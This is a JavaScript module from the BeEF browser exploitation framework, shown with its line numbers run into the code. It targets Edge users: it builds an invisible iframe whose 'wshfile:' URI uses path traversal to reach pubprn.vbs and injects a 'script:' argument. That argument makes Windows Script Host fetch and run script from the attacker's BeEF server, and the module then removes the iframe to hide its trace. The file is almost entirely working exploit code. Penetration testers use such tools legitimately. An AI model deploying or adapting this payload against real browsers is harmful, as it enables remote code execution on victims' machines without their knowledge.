Path: blob/master/modules/social_engineering/edge_wscript_wsh_injection/command.js
1873 views
//1// Copyright (c) 2006-2026Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function(){7var timeout = 5;89if (!beef.browser.isEdge()) {10beef.debug("[Edge WScript WSH Injection] Browser is not supported.");11beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.are.status_error());12return;13}1415try {16var wsh_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();17var beef_host = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port;18wsh_iframe_<%= @command_id %>.setAttribute('src', 'wshfile:test/../../../../../../../Windows/System32/Printing_Admin_Scripts/' + navigator.language + '/pubprn.vbs" 127.0.0.1 script:' + beef_host + '/<%= @command_id %>/index.html');19} catch (e) {20beef.debug("[Edge WScript WSH Injection] Could not create iframe");21beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.are.status_error());22return;23}2425// clean up26cleanup = function() {27document.body.removeChild(wsh_iframe_<%= @command_id %>);28}29setTimeout("cleanup()", timeout*1000);30});313233